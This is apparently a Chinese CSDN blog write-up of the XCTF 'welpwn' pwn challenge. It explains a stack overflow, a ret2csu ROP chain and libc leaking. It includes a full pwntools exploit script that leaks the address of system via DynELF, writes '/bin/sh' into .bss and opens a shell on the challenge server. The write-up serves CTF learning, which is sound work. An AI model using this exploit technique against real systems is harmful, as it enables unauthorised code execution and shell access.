xctf_pwn welpwn writeup

最新推荐文章于 2022-12-05 19:36:31 发布
最新推荐文章于 2022-12-05 19:36:31 发布
阅读量375 收藏
点赞数
分类专栏: ctf pwn 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yagamilaido/article/details/106167439
版权
ctf 同时被 2 个专栏收录
1 篇文章 0 订阅
订阅专栏
pwn
1 篇文章 0 订阅
订阅专栏

xctf_pwn3 welpwn

文章目录

程序分析

  1. 惯例查信息
    在这里插入图片描述

  2. 程序逻辑简单粗暴,读0x400字节(这里无法溢出)。
    在这里插入图片描述
    然后echo中打印,打印前拷贝到16字节数组中,存在栈溢出
    在这里插入图片描述

3.考虑x86_64下著名万能ROP,一直没怎么用过这次拿来练练手(捂脸)

_libc_csu_init 函数下的 pop&call
万能ROP

​ 注意 0x0000000000400880,可知道 r13、r14、r15 分别对应前三个参数,r12保存调用地址的指针。

刚刚好 0x0000000000400896 下面有一系列的 pop 可以满足我们的要求。

我们只要令 rbx+1=rbp就可以实现调一次后继续后面的 gadget。

4.由于echo拷贝时会在 \x00 处截断,那么会导致之后的ROP无法执行,所以开始先执行pop 32字节的gadget跳过前面32字节。

echo stack frame 布局如下

| 0x18 bytes | return address | 0x400 byes |

| 0x18 bytes | pop 32 bytes gadget address | other gadgest

5、由于不知道libc地址,需要泄露,有一些挺有用的库可以帮助我们快速确定libc的一些信息。

比如

  • LibcSearch

    库: https://github.com/lieanu/LibcSearcher.git

    离线版:https://github.com/lieanu/libc-database

    在线版:libc database search

  • pwntools 的 DynELF 函数

exp思路

1、利用 echo 栈溢出+万能ROP链,泄露 system 函数地址
2、把 system 地址写到 .bss 段
3、把 “/bin/sh\x00” 写到 .bss段
4、调 system。

注意如果第一步用的 LibcSearcher 的话(DynELF大概也可以做到,没研究过),可以根据 .got 的函数地址信息确定libc版本,那么/bin/sh/\x00 地址也可以直接知道了,就不用2、3步骤去写到确定的地址。我写完exp才知道有LibcSearcher这么好的库, 所以这里绕了点弯路。。。

from pwn import *

#context.log_level = "DEBUG"

import sys
if len(sys.argv)>1 and sys.argv[1] == "local":
    io = process("./81f42c219e81421ebfd1bedd19cf7eff")
else:
    io = remote("124.126.19.106", 50041)

pop6addr = 0x000000000040089A
callrop = 0x0000000000400880
mainAddr = 0x00000000004007CE
pop4addr = 0x000000000040089C
retaddr = 0x00000000004008A4
rspPlus64Addr = 0x0000000000400896

readgotaddr = 0x0000000000601038
writeGOTAddr = 0x0000000000601020

def call(funAddr, argv0=0x0, argv1=0x0, argv2=0x0):
    payload = flat("a"*0x18,p64(pop4addr),
        p64(pop6addr),
        p64(0),p64(1),
        p64(funAddr),p64(argv2),p64(argv1),p64(argv0),
        p64(callrop),
        p64(0)*7,
        # 栈平衡,经测试不用平衡也够用
        # (p64(rspPlus64Addr),p64(97)*7)*12,
        # p64(pop4addr),p64(97)*4,
        p64(mainAddr))
    io.sendlineafter("RCTF\n", payload)

def leak(address, length=8):
    call(writeGOTAddr, 1, address, length)
    data = io.recvuntil("Welcome")[:-7][-8:]
    print("%#x => %s" % (address, enhex(data) or ''))
    return data

# step 1
mem = DynELF(leak, elf=ELF("./81f42c219e81421ebfd1bedd19cf7eff"))
systemaddr = mem.lookup("system", "libc")
print("[+] systemaddr: 0x%x" % systemaddr)

# step 2
bssAddr = 0x0000000000601500
call(readgotaddr, 0, bssAddr, 8)
io.send(p64(systemaddr))

# step 3
bssbuffAddr = 0x0000000000601508
cmdstr = "/bin/sh\x00"
call(readgotaddr, 0, bssbuffAddr, len(cmdstr))
io.send(cmdstr)

# step 4
call(bssAddr, bssbuffAddr)
io.interactive()

在这里插入图片描述

0bs3rv3r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LibcSearcher--匹配libc版本的神器
Assassin
04-06 8961
文章目录**一、简介****二、安装****版本一:本地判断libc的方法****版本二:在线使用webAPI的方式****三、关于本地libc文件的更新问题****四、使用方法** 一、简介 LibcSearcher是python的一个库,用于解决pwn中不明libc版本的情况,可以根据泄露的某函数地址,推测服务端使用的libc版本,是做题必备的神器。 根据网上的版本,我总结两个可以利用的方法 二、安装 版本一:本地判断libc的方法 使用原作者的版本即可,安装指令如下 git clone https
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 631
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
[攻防世界]-welpwn
m0_55906008的博客
12-05 560
pwn
[XCTF-pwn] 10-welpwn-rctf-2015
weixin_52640415的博客
02-26 231
很久前的题,主程序里没有溢出,echo里遇0截断这里虽有溢出但也写不了rop,64们0太多了。 思路是,A*0x10+0这样会将rbp的尾部1字节置0,然后在payload尾部写rop,中间补ret int __cdecl main(int argc, const char **argv, const char **envp) { char buf[1024]; // [rsp+0h] [rbp-400h] BYREF write(1, "Welcome to RCTF\n", 0x10uL
LibcSearcher的安装使用
热门推荐
qq_40026795的博客
06-26 1万+
LibcSearcher是针对pwn做的python库,在做pwn题时寻找libc版本非常好用,使用方式也非常简单: fromLibcSearcherimport* #第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型 obj=LibcSearcher("fgets",0X7ff39014bd90) 可以安装也可以直接将LibcSearcher.py拿到...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
XCTF_A_成本管理标准功能培训.pptx
09-25
XCTF_A_成本管理标准功能培训.pptx
welpwn pwn 入门题
02-11
pwn 入门题
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍 修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。 产品特点 自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位和64位 调试增强(支持PIE )。 符号 断点 杂项 libc-database one_gadget 堆? 好吧,不支持堆分析。 但是我有一个给你的礼物。 安装 您有两种使用welpwn 。 通过安装 从0.9.3版本开始已添加setup.py 。
LibcSearcher.zip
06-09
项目地址:https://github.com/lieanu/LibcSearcher,因为依赖于庞大的https://github.com/lieanu/libc-database,大概有490M左右
LibcSearch报错 LibcSearcher找不到合适libc 最新解决方案
csdn546229768的博客
11-06 3134
如果大家在执行Libcsearch 的pyload时发生报错信息翻译过来时找不到适合的libc,这是因为极大可能你使用的环境是python3而你参照网上的pwn环境搭建时,你下载的LibcSearch它不支持py3!! 解决方式:用pip3下载另一个大佬更新的版本 命令如下: pip3 install LibcSearcher 安装完成后用py3运行payload,由原来的本地libc查找改为了云端,也就是说需要联网才可以执行这个库,但是不影响平时练习,除非你进入了CTF决赛。。 我安装新版后用py3执行
PWN】2019-ciscn your——pwn
Joaus的博客
05-05 863
这题的漏洞点就在数组下标越界,造成栈上任意地址读写。 在做的时候遇到的坑点: 1.在于数组类型转换输出会造成误导: 2.对不给libc.so的题可以用libcsearch和onegadget配合得到onegadget地址,因为我直接调用system函数会出现段错误,应该是在对栈上数据进行操作覆盖了环境变量???但是用onegadget就成功getshelll。 from LibcSearcher...
攻防世界PWNWelpwn题解
seaaseesa的博客
11-06 1550
首先用IDA查看 发现主函数不能栈溢出,我们看看echo这个函数 echo会把主函数输入的字符串复制到局部的s2里,并且s2只有16字节,可以造成溢出。Echo函数先循环复制字符到s2,如果遇到0,就结束复制,然后输出s2。因此,我们如果想直接覆盖函数返回地址,那么我们的目标函数必须没有参数,否则,我们用p64(…)包装地址时,必然会出现0。 比如我们的payload为payload...
攻防世界 welpwn WP
Zarcs_233的博客
01-29 920
这道题出的确实很wel 拿到这题,查看保护 发现shellcode走不通,一般都是走rop路线 IDA打开,分析代码,发现main函数内调用了echo函数 这里的buf有0x400大,但是main不存在栈溢出,继续点开echo 这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。 很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止...
pwn-welpwn
醉等佳人归
09-08 259
1.题目 1.保护机制 开启nx 2.关键代码 主函数 echo函数 2.思路 重点1:可以看到栈溢出漏洞,但是echo函数代码显然限制了ROP链中有\x00的出现,但是我们发现echo函数栈非常小,导出我们溢出可以溢出到主函数的buf缓冲区中,而且主函数的buf是不受\x00影响的,所以我们先使用pop覆盖echo函数的返回值,然后在主函数的buf中执行shellcode 重点2:这次试用了LibcSearcher库来完成函数地址泄漏 from pwn import * from ctypes imp
XCTF PWN高手进阶区之babystack
neuisf的博客
01-30 476
此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
pure_color xctf
最新发布
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值